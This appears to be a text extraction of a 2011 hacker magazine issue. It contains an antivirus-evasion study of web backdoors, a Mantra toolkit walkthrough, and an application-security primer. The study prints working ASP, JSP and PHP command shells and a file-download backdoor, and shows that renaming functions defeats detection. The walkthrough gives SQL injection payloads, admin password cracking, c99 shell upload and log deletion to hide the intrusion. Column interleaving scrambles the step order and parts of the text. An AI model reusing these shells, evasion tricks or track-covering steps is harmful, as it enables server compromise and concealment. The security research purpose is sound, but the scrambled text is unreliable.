Issue 13 – Feb 2011 | Page - 1
Issue 13 – Feb 2011| Page - 2
Issue 13 – Feb 2011 | Page - 3
Effectiveness of Antivirus in Detecting Web Application Backdoors Abstract This paper gives detailed idea of the effectiveness of Antivirus software‘s in detecting various Web Application backdoors that widely affect Web Servers. The analysis would prove the inefficiency of current Antivirus techniques in detecting Web application backdoors and its consequences.
Introduction considering the increased number of attacks on Web Applications and defacement statistics on Web Servers, it‘s high time to review the security of Web Servers and protection mechanism aided to prevent them. Zone-H report at http://www.zone-h.org/news/id/4735 says that the defacements count gets doubled every year. They also add that the methodologies used to gain access are still the same ―Application Layer
Vulnerabilities‖. Let‘s not go into application vulnerabilities but instead take a look at the very common web application Backdoors that are commonly used by hackers and how Antivirus being used widely on many Web Servers is incapable of detecting them.
Issue 13 – Feb 2011| Page - 4
companies too. But that‘s not the case with web backdoors they don‘t have any self spreading mechanism and as they are only targeted on a particular server and thus the most common Backdoors signature remains unknown
Diagram - 001 Normally an attack goes like Diagram 001, where attacker finds vulnerability in a hosted web application and he manages to upload a malicious application backdoors in one of the servers supported languages, like ASP, PHP, ASP.NET, JSP etc. And this gives him control over the entire Web Server. Firewalls and Antivirus softwares are always part of a network. Firewalls are mostly not asked to monitor web traffic. So the only security measure the Web servers depend upon for this is the Antivirus. And we will go in detail analysis of common web application backdoors and how AVs lack in catching them.
Antivirus Detection Mechanisms and Where They Lack Signature Based Detection In this technique the Antivirus software‘s need to have the signature of the Backdoor, and for that the companies should already have a copy of the backdoor for analysis. Reasons behind ―Signature Based‖ Backdoors
ineffectiveness of detection of Web
1) Signature based detection works fine with self propagating worms as there mass spreading mechanism will some way make it to the AV
2) The signatures are not built based on instructions like in PEs, but instead using strings and function calls. Simply renaming a function call, string or changing the order of the program can prove to be enough to bypass ―Signature Based Detection‖ approach Note: Given below are some samples analyzed for example purpose. All the samples analyzed were downloaded form a collection of common web backdoors archive found on internet a few years back, Virus Total was used for this analysis. Test # 1.1 Objective: Test on an old and popular backdoor which proves that popularity matters for detection Backdoor / File name: C99.php Description: A very old and widely used
backdoor having. Great numbers of options. Born some 12 years ago, signatures are available with most of the Antivirus software‘s. Analysis: Shows that 81% AVs detect the
old man
File name: c99_locus7s.php Submission date: 2010-12-27 08:06:42 Result: 34 /42 (81.0%)
Issue 13 – Feb 2011 | Page - 5
Test # 1.2
Test # 3.1
Prove that Signature based detection is very easy to bypass when it comes to detect a web application backdoors as it‘s based on strings.
Objective: Signature based detection of
Description:
popular backdoor detected by all Av‘s. The aim is to try to make it undetectable by the AVs. An Active Server Page‘s simple command execute backdoor named cmdasp.asp was obtained from a very old archive http://michaeldaw.org/projects/webbackdoor-compilation
Objective:
Web backdoor‘s built-in scripting languages are easy to bypass, the signatures are not build based on instructions like in PEs, but instead using strings and function calls. Simply renaming a function call or changing the order of the program would be enough to bypass the AV. A second test was done by simply removing the Change logs (Authors name and update logs) from the top of the script and the reanalysis showed that only 27 AV detected it now.
File name: c99_locus7s.php Submission date: 2011-01-25 12:17:19 Result: 27 /43 (62.8%)
Web Application backdoors are easy to bypass Description: A test on another old and
Analysis: 81% of the AVs detected the script because of its popularity and availability of signature
File name: cmdasp.asp Submission date: 2011-01-25 19:33:07 Result: 35/ 43 (81.4%) Test #3.2
Test #2.1 Objective: Test on an old and not so popular backdoor to prove that it‘s really hard for web application backdoors to reach AV vendor for signature building Description: Another pretty old sample was taken from the same web backdoor collection but with less functionality, although enough to deface a site Analysis: Shows that only 2 AV detects the
backdoor.
File name: AK-74 Security Team Web Shell Beta Version.php Submission date: 2011-01-25 17:33:25 Result: 2/ 43 (4.7%)
Objective: Signature based detection on Web Application backdoors are easy to bypass Description: The above mentioned sample which contained some HTML CODE (just for formatting output) was edited in notepad and the HTML contents were stripped off leaving the actual backdoor code unhampered. Also functions were renamed and then backdoor was subjected to analysis //html striped cmdasp.asp On Error Resume Next dim resp ' -- create the COM objects that we will be using -- ' Set woot = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Analysis: The analysis showed that striping resp = woot.Run ("cmd.exe /c " dir, of useless plain HTML form the ASP code 0, True) Response.Write Server.HTMLEncode(resp)
Issue 13 – Feb 2011| Page - 6
Analysis:
The analysis showed that scripting of useless plain HTML form the ASP code and renaming the functions made it Undetectable by all the Avs while still providing full functionality
File name: test2.asp Submission date: 2011-01-25 19:57:03 Result: 0/ 43 (0.0%)
Heuristics Based Detection Not many Antivirus vendors depend upon heuristics for Web backdoor detection. Only a few prominent and leading Anti viruses employ this detection. Why heuristics based detection is not employed when it comes to Web Application? 1) Heuristics detection is based on dynamic analysis and is always considered risky as the chances of false positives are very high, and when it comes to Web Application, the risk is pretty high 2) Web Application undergoes updates and changes more frequently as compared to PE files, and the methodologies used for PE detection cannot be fully utilized here 3) Executables can be added with a legitimate sign in case of PEs but that‘s not possible with Web Scripts 4) Static analysis on PE, based on few critical and exceptional APIs cannot be used for static heuristic detection. But in Web Application, even one flagging on such a function call will make a legitimate code black listed
5) Dynamic analysis at runtime is not used on scripting languages as the codes are interpreted 6) Threat classification and Risk Analysis for Web Application is hard to automate For analyzing the above lets discuss a few common features of Web Application backdoors. As such a Web backdoor would have some or all of the following features 1) Execute System Commands On The Web Server 2) Traverse Directories And View/Edit Files And Programs 3) Upload Feature – Helpful In Local Privilege Escalation 4) Download Documents And File 5) Registry Editing 6) Execute A Reverse Connect, Bind Shell 7) Database Management A Web backdoor with the first feature [Execute commands] will itself be capable enough to perform the rest of the features, in one way or other. So let‘s further discuss on that. Command execution is possible with almost all scripting languages, that is if certain default functions are not disabled on the environment depending upon the language. Also, and except [1], [6] and [7] are legitimate Web Application behaviors, so there is greater possibility of getting detected. Test # 4.1 Objective: Testing simple command execution Backdoor in JSP, PHP using default system command execution functions and analyzing the efficiency of Antivirus in static heuristic detection
Issue 13 – Feb 2011 | Page - 7
Command Execution shell in .jsp that can be compiled to .war java web archive format.
// cmd.jsp <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML>
Analysis: No Antivirus detected it
File name: cmd.jsp Submission date: 2011-01-25 21:32:32 (UTC) Result: 0/ 43 (0.0%)
Issue 13 â&#x20AC;&#x201C; Feb 2011| Page - 8
Test # 4.2 Objective: Command Execution shell in PHP which can be added to an already existing PHP file and can process request via User-Agent header <?php passthru(getenv("HTTP_ACCEPT_LANGU AGE")); echo '<br> Fb1h2s'; ?> Analysis: No Antivirus detected it
File name: accept_lanaguage.php Submission date: 2011-01-25 21:36:20 (UTC) Result: 0/ 43 (0.0%) The above analysis shows that even though the getRuntime().exec and passthu() functions were present in the code the static analysis of the AVs were not able to detect those critical function calls. Threat classification and Risk Analysis for Web Application is hard to automate. It becomes hard to detect which piece of code is legitimate and which one is not. Consider the following tests
Code: Download File from server // Download_file.jsp by fb1h2s <%@ page import="java.util.*,java.io.*"%><% File f = new File (request.getParameter("d")); response.setContentType ("application/ear");response.setHeader ("Content-Disposition", "attachment; filename=\"fb1h2s.bak\""); InputStream in = new FileInputStream(f);ServletOutputStream outs = response.getOutputStream();int bit = 2555555;int i = 0;while ((bit) >= 0){bit = in.read();outs.write(bit);}outs.flush() ;outs.close();in.close();%>
Analysis: No antivirus scanners detected it [Static and heuristics scan] due to inefficiency of detecting web backdoors at runtime. The above program is a threat, and these kinds of backdoors are hard to detect by automated AVs, unless there is a policy created for files and folders regarding accessibility
File name: download_jsp.war Submission date: 2011-01-26 3:36:20 Result: 0/ 43 (0.0%)
Test #4.3 Objective: Classifying a threat. Run time analysis is not possible on Web Backdoors Description: Given below is a simple program in JSP that can download files from the server. Downloading a file from web server is a legitimate activity and cannot be used as a reason for heuristic detection. But what if the program tries to download a configuration file or other critical files from the server. These kind of backdoors cannot be detected unless a runtime analysis is performed. And hence lack of detection is observed.
Conclusion Web applications and environments hosting is growing rapidly and the necessity of providing improved security is increasing. The in efficiency of current Antivirus softwareâ&#x20AC;&#x2DC;s in detecting Web Application backdoors is proved to be inadequate. These factors add up to the need of Antivirus vendors becoming apprised of Web Back door and improving specialized detection techniques. Also advises Web Server administrators need to be advised not to fully depend on native AV/Firewalls for preventing Web intrusions.
Issue 13 â&#x20AC;&#x201C; Feb 2011 | Page - 9
References and Appendix Test # 1.1 http://www.virustotal.com/filescan/report.html?id=63d02e75b729e2cc1 7604235cf9c0b506b3ca5d578a8e32a0e85 e28763ca25a6-1293437202 Test #1.2
cc7eadad05233a51fedb146c316017c31bf18 56fd8f2a5-1295949577 Test #4.3 http://www.virustotal.com/filescan/report.html?id=092e2e97b33119a97 441c24194c49bf75d3cec7371c42fb1f94e2e caeb78d8c9-1295936735
http://www.virustotal.com/filescan/report.html?id=07623faf67eae7706 dbe43bf45f383a1c19b6ab81dbc941ea7e47 030412c7166-1295957839 Test #2.1 http://www.virustotal.com/filescan/report.html?id=dc91561fd0b7a555e 9e1a26fdd189d18832b9d896f50e7f8afa15 3773d1a851c-1295976805 Test #3.1 http://www.virustotal.com/filescan/report.html?id=101bf8dcdd414f09b a46cdecbd96e8606c79b0e76b6a2ce0403 95e775cb4da86-1294670298
Test #3.2 http://www.virustotal.com/filescan/report.html?id=1b686ac4c7ffca2e54 6e3c82d0b9012109f74d72f957615395b04 3923b83054e-1295374370 Test # 4.1 http://www.virustotal.com/filescan/report.html?id=6c4ccd3589f1d6484 3e884382b448f03d1277317524fa45e06d5 19b4b9ed5dc0-1295991152 Test #4.2 http://www.virustotal.com/filescan/report.html?id=f1460fb9e543fb5d1c
FB1H2S aka Rahul Sasi http://fb1h2s.com http://garage4hackers.com Rahul Sasi is a person highly passionate about Ethical hacking, and is working as a Info Security Consultant.
Issue 13 â&#x20AC;&#x201C; Feb 2011| Page - 10
Mantra â&#x20AC;&#x201C; Free and Open Source Security Framework What is Mantra? Mantra is a collection of hacking tools, addons, and scripts based on Firefox. Right from the beginning, one Firefox and Google Chrome of the attractive features which made both of them outstanding was their expandability by means of installing useful extensions or add-ons. Programmers and developers started coding add-ons which helped to make the online web more easy and functional. Naturally, there were add-ons developed for hackers too. Some went out dated, some were very powerful, and some
went unnoticed despite their powerful capabilities. We tried to get all the add-ons of this type available out there on the internet, installed, analyzed, ranked and after that included them on our own security toolkit. By looking at the total number of exploit getting added to the exploit db, we think that an exploit development framework based on the browser can get very good acceptance from the security and hacking communities and this triggered the making of Mantra. As of now Mantra is just a security toolkit rather than a full-fledged framework. We think itâ&#x20AC;&#x2DC;s always better to give a choice to the end user rather than providing what we think is the best. So once the community is up and we have a crowd, we will go ahead and finalize the basic criteria for framework the and will work on their behalf.
Some of the features of Mantra 1. Its built on top of the browser - Saves lots of man power and learning curve.
Issue 13 – Feb 2011 | Page - 11
2. It is Cross platform and flexible - It can easily run on Windows, Mac and Linux natively 3. Its free as "free beer‖ and "free speech" 4. Its open source, so you are free to use it or modify it your own way.
What is the use? According to the present age standards, Mantra can be helpful to perform all five phases of attacks like reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access and covering tracks.
What Mantra is NOT? 1. It‘s Not a one click automatic Pwnage tool (please don't think that it‘s a stick in a magician‘s hand. May be it be possible for us to make it a one click pwnage tool at least for some common types of attacks in the future. But not now) 2.It‘s not mature enough to serve ―everything‖ for a user to perform any sort of attack 3.It can‘t be used as a replacement for your normal browser. It‘s not fast enough, does not have plenty of space to play with etc. 4. You can find that there is more than one tool present in the toolkit for performing same sort of attacks but at the same time it lacks some simple tools here and there.
Who needs it? Nice question. If you are into auditing, vulnerability assessment, penetration testing or information security training etc., you are going to be benefited from this
project. We are looking out for bringing attention of the security researchers to the possibility of such a platform. If many people are use it, definitely the community will grow and we will be able to see more powerful functional and targeted tools in the near future.
How you can contribute? Since it‘s an open source project, you are encouraged to become a part of it. We need developers for writing codes, modifying extension framework, theme designers for artworks and documentation writers to help better promote the project.
Close Look Beta version of Mantra Security Toolkit can be downloaded from http://getmantra.com/download/. As of now its available for both Linux and Windows platforms. It comes as a self extracting archive and needs almost zero setup. The graphical user interface provided by Mantra security toolkit is straight forward and easy to use. The navigation bar is placed on top of the toolkit and it integrates the search bar into it. Search engines can be switched easily by using keywords or by clicking on their respective icons. As of now it supports searching on XSSed, SecurityFocus, OSVDB, PacketStorm, Pcapr, Extploit-DB, Scroogle, RFC, OVAL etc apart from normal search engines. It also supports autocomplete and real-time search suggestions.
Issue 13 â&#x20AC;&#x201C; Feb 2011| Page - 12
Step 1: I'm on the home page of the website now. [code]http://192.168.132.128/[/code]
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar1.jpg[/img] Step 2:
The sidebar is located on the right side of the toolkit which gives one click access to all the tools available on the toolkit. Tools can be fine tuned according to the user's needs from the sidebar itself. You can see all the tools packed into it at http://getmantra.com/tools/ The status bar on the bottom gives various information about the current webpage including remote IP, location details, technologies used etc. More details about particular information can be obtained by simply clicking on the respective notifications on the status bar. There are also a proxy button, to switch between proxies, Passive Reconnaissance button, to conduct packet less discovery of target resources, quick profile switcher to play with cookies etc.
A quick demo In this particulate demo we will try to root a remote web server using Mantra security toolkit. Due to space limitation, I have not included the screen shots. To view them please follow the image links mentioned under every step.
As of now Mantra does not have any crawling mechanism to find vulnerable URLs on the website (read it as a limitation). So we have to do that manually. I went through all the pages of web site and found a page with URL input [code]http://192.168.132.128/?id=13[/code]
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar2.jpg[/img] Step 3: I launched Hackbar by pressing F9. Hackbar is a tool for doing basic audits on web pages. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar3.jpg[/img]
Step 4: The power of single quote. I'm checking the web site is actually sanitizing the input or not by putting a ' at the end of the URL and pressing on the Execute button. [code]http://192.168.132.128/?id=13'[/code]
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar4.jpg[/img]
Issue 13 – Feb 2011 | Page - 13
Since the page content is different from the previous one. I can make sure that the web page is not sanitizing the input from the URL. Step 5: Let‘s find out the number of tables in the current database.
[code]http://192.168.132.128/?id=13 order by 8[/code]
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar13.jpg[/img] Step 9:
[code]http://192.168.132.128/?id=13 order by 1[/code]
Now let‘s go ahead and make a UNION statement. I can make it easily by going to SQL > UNION SELECT STATEMENT
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar6.jpg[/img]
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar14.jpg[/img]
Step 6:
Step 10:
I have to keep on increasing the last number till I see any changes in the page. In usual practice it‘s going to be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exist and there are only 7 tables. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar16.jpg[/img]
[code]http://192.168.132.128/?id=13 order by 7[/code]
Step 11:
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar7.jpg[/img]
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2.
Step 7:
[code]http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7[/code]
I went up to 7 and no change till now. [code]http://192.168.132.128/?id=13 order by 7[/code]
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar12.jpg[/img]
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar19.jpg[/img] Step 12:
Step 8:
I replaced number 2 in URL with another SQL command, it got executed and the result is displayed on the page.
I'm on 8 now and now I can see the page changed.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7[/code]
Issue 13 â&#x20AC;&#x201C; Feb 2011| Page - 14
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar21.jpg[/img] The current user is cms_user@localhost. Step 13: Letâ&#x20AC;&#x2DC;s find out the version of the database. I replaced 2 in the URL with version() command. [code]http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7[/code]
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar22.jpg[/img] 5.0.45 is the version Step 14: Let me list all the tables. [code]http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables[/code]
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar23.jpg[/img] From this list I found "user" as an interesting table. Step 15: Now I listed all the columns and its a big list. [code]http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns[/code]
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar24.jpg[/img]
Step 16: I want to filter out columns from the table "user". [code]http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'[/code]
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar25.jpg[/img] Step 17: Lets find the user name. [code]http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user[/code] [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar27.jpg[/img] Step 18: And password, of course. [code]http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user[/code]
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar26.jpg[/img] Its encrypted. Step 19: Decrypting the password. I'm making a guess here that the password is encrypted using MD5 by looking at the length and other parameters of the data. I copied the MD5 hash, pasted it into the hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Issue 13 â&#x20AC;&#x201C; Feb 2011 | Page - 15
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar30.jpg[/img] Step 20: Voila.!!! I got the password! [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar31.jpg[/img] Step 21: Finding the log in page. Its was right in front of me [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar32.jpg[/img] Step 22: Logging in with the credentials I have [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar33.jpg[/img] Step 23: Greetings.!!! [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar35.jpg[/img] Step 24: I'm an admin now. Look at my powers. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar36.jpg[/img]
Step 25: Let me add an event. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar37.jpg[/img] Step 26: And of course I want to upload a picture. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar38.jpg[/img] Step 27: Let me test the filtering mechanism of the website again. I'm trying to upload a PHP shell using the facility of website to upload custom picture. Lets see whether its possible or not. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar39.jpg[/img] Step 28: Now I'm pressing on "Add Event" button. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar40.jpg[/img] Step 29: Nice. Looks like it's got uploaded. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar41.jpg[/img]
Issue 13 â&#x20AC;&#x201C; Feb 2011| Page - 16
Step 30: Let's see where the shell got uploaded to. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar42.jpg[/img] Step 31: I'm trying to get the default upload location. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar43.jpg[/img]
Now I can do whatever I wish. Deface the website, maintaining access or whatever. Step 35: What I'm interested is the log folder. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar49.jpg[/img] Step 36: I clicked on the log.log file and it has the logs of my noisy SQL injection attacks.
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar44.jpg[/img]
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar51.jpg[/img]
Step 32:
Step 37:
Looks like I got it.
Let me go back and edit the log file.
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar45.jpg[/img]
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar52.jpg[/img]
Let me click on the c9shell.php file I just uploaded.
[img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar53.jpg[/img]
Step 33: Voila. I have shell access!! [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar46.jpg[/img] Step 34: I simply clicked on the up button to get the root folder. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar48.jpg[/img]
Step 38: I deleted the complete log entries. Now saving it. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar54.jpg[/img] Step 39: Nice. Log file is empty now. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar56.jpg[/img]
Issue 13 â&#x20AC;&#x201C; Feb 2011 | Page - 17
Step 40: Now, letâ&#x20AC;&#x2DC;s remove the c99 shell by pressing on Self Remove. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar57.jpg[/img] Step 41: Confirmed!!! [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar58.jpg[/img] Step 42: OK. Good Bye C99!!! [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar59.jpg[/img]
Abhi M Balakrishnan Abhi M Balakrishnan is an Electronics hobbyist turned Hacktivist, Working as Information Security Consultant to put food on his table and roof over his head and has Performed several security consulting assignments in the area of penetration testing, code reviews, web application assessments, security architecture reviews etc.
Step 43: Well. It got deleted itself. [img]http://i941.photobucket.com/albums/ ad251/Abhi1299/Mantra%20Hackbar%20T utorial/mantrahackbar60.jpg[/img] Happy Hacking.!!! :-) If you have any suggestion or query please mail us at contact@getmantra.com Or you can also contact us at: getmantra.com/forums twitter.com/getmantra facebook.com/pages/Mantra/17078748962 7527
Yashartha Chaturvedi Yashartha Chaturvedi is an Independent cyber security consultant, believes in ethical hacking, provides innovative solutions and knowledge based training to secure computer/mobile from cyber criminals, having an aim to educate the common internet user against the most dangerous security loopholes,vulnerabilities and attacks by publishing regular updates/patches.
Issue 13 – Feb 2011| Page - 18
Application Security – Basics
The
The Institute for Security and Open Methodologies (ISECOM) defines security as "a form of protection where a separation is created between the assets and the threat". Security in general has many categories, it can be the security of physical assets like Home, Airport, Infrastructure, or some kind of political security like Human security, national security or computer security which itself has many categories. Despite of so many categories for security, two entities are always involved i.e. Asset and Threat. In all scenarios the ―asset‖ has to be protected from the ―threat‖. Considering our home security, we all lock our doors before going out. Here home is the asset and threat is the thieves. If the thief is intelligent enough he will gather all our information like at what time the home is usually vacant, how many people live there, or what kind of lock you have applied. This all information will help him to breach your home security. Similarly in the IT security world, asset may be the data flowing through Network, data stored on a Server, or a Database and threats are the hackers. Same as thieves the hackers first step is ―Information Gathering‖.
With Reference to information security we can divide security into categories like Application Security, data security, Network Security and others. In this article we will focus more on the Basics of Application Security. ‗Wiki‘ says Application security encompasses measures taken throughout the application's life-cycle to prevent exceptions in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgra de, or maintenance of the application. In simple words it comprises the security issues involved in any type of application, including but not limited to java, PHP, C++, and python.
Issue 13 â&#x20AC;&#x201C; Feb 2011 | Page - 19
Application Security Trends The world of internet is growing in tremendous way with IPv4 addresses getting depleted. With growth in number of users, sophistication in technology, the attack vectors have also increased. The graph below shows the study by SANS institute, depicting the growth in the number of attack vectors in first half of year 2010.
So, it can be said that the two sides of the application security, both good and bad, are in a constant state of evolution.
The malicious guy comes in: THE HACKER
Thus, with the increasing sophistication and numbers, of attacks and defense techniques, it has become a cat and mouse game. The attacks earlier focused on the Operating Systems themselves. However, with a continuous effort and improvement on the Operating Systems, the vulnerabilities are difficult to find in them, hence resulting in the shift of the fulcrum from the Operating System to the targeted applications. The graph below shows the trend for four popular applications, i.e. Adobe reader, Ms Word, Ms Excel and Ms Power point. If you look at the Adobe, you will see that the vulnerabilities increased drastically for year 2010.
There might be some guys with the malicious intent, who might be looking to compromise your assets. They might be technology geeks, freaks and motivated hackers, attacking your applications just for fun, or for profit. Many times, they are also funded by high profile companies or even governments to target the sensitive data and assets of companies or countries they are in competition. Well known Stuxnet worm and the Aurora attacks are just a few examples; of this; however, there might be many attacks that go unnoticed by the governments and the organizations.
Issue 13 – Feb 2011| Page - 20
These attackers try to gather as much information as possible for the target. This will involve a lot of searching on the search engines, news groups, job sites, your own site, public forums, social networks like facebook, myspace, orkut etc. A lot of information can be harvested in this manner which can be later misused to breach security. This information includes email ids, date of birth, likings and disliking, girl friends and boyfriends, the software used in the company, location and much more. A popular quote in the hacking world says ―Deterministic hackers spend 90% of their time in information gathering phase, rest 10% is spent on the breach‖.
Knowing the threats: Build your walls strong enough The assets need to be secured from the threats. However, for securing the assets, there needs to be a proper knowledge on the boundaries of the application from which input comes. In other simple words, the first rule of security is ―the user input MUST not be trusted‖. So, for securing the application, the application castle should be strong enough to stop the malicious input on the walls itself. This approach is called as input validation. The other approach is that even if the enemy enters the castle, don‘t let them go away, or cripple them. This approach is termed as output validation. These threats can come from any input, which may include a form field, url, cookies, post parameters etc. These inputs should not be trusted in any manner, as this ―trust‖ is what leads to the compromise.
Deeply understanding the threats: Ohh… they are so many The attack techniques have evolved over time, and there are many ways in which the applications can be compromised. The attacks can be following but not limited to:
Cross site scripting SQL injection Buffer overflows Cross site request forgery XPATH injection Format string attacks Heap overflows Redirection attacks Authentication attacks Authorization attacks Canonicalization attacks OS commanding SSI includes Parameter pollution Session based attacks Sniffing Spoofing Phishing
These are only a few examples. Many more exist and the list keeps on getting updated on a regular basis. A simple Google search on ―Cross site scripting‖ or any of these will
Issue 13 â&#x20AC;&#x201C; Feb 2011 | Page - 21
give you thousands of results, which are enough to explain the vulnerability. There are many security projects(OWASP) and institutes(SANS) working to create freelyavailable articles, methodologies, documentation, tools, and technologies to provide unbiased, practical, cost-effective information about application. These communities also release a list of the top vulnerabilities at regular interval of time.
Save
Me
and educate themselves so as to involve a secure methodology in the lifecycle of the development. These vulnerabilities are large in number, and hence require a thorough study.
Please
For each of the vulnerabilities, there exist different ways to mitigate them. However, speaking in a generic manner, all the vulnerabilities can be prevented by proper validations, both on input and output. If only one of these is done, this vulnerability can surely be exploited by an attacker. So, it is always better to have a two way defense mechanism, which acts as a double shield to prevent the attacks against the application. When the development of a application is done, an approach that ensure both these validations at the same time should be followed. This is the best possible solution to mitigate the attacks. As far as targeted application like Acrobat Reader or Microsoft applications are concerned the only way to save yourself, is to have updates which are, released by the vendors. Even if you miss a single update your machine is vulnerable to any type of attack. Presently there are many tools to prevent applications from getting hacked but at the end itâ&#x20AC;&#x2DC;s in the hands of the application developer to make his application secure enough and not only checks if all the doors are locked but ensure that every other entry point is also locked and secured.
Conclusion Thus, we can conclude that the threats on the applications are on a continuous rise, and developers need to be aware of these
Ankur Bhargava Working as a security researcher in Infosys Technologies, his daily job includes malware analysis, detection and prevention, network and application penetration testing and secure code review.
Saurabh Sharma He is working in Infosys Technologies Limited. His primary responsibility is to provide Enterprise Security Solutions to our clients. He has a good understanding on Application Security dealing with Threat Modeling, Secure code analysis and Penetration testing.
Issue 13 â&#x20AC;&#x201C; Feb 2011| Page - 22
CHMag: 06.02.2010 to 06.02.2011
Issue 13 – Feb 2011 | Page - 23
It is a matter of rejoice for us to see CHMag entering in to its second year of publication. Considering the overwhelming response of the people, we feel that we are on the right track towards our objective. When we look in to past, a wave of exhilaration passes through us and we also wonder how we could do it. We had heard that an idea could change the lives or a lot of things could take over a cup of coffee, but never experienced it. We experienced it only when we freezed on the idea of starting a
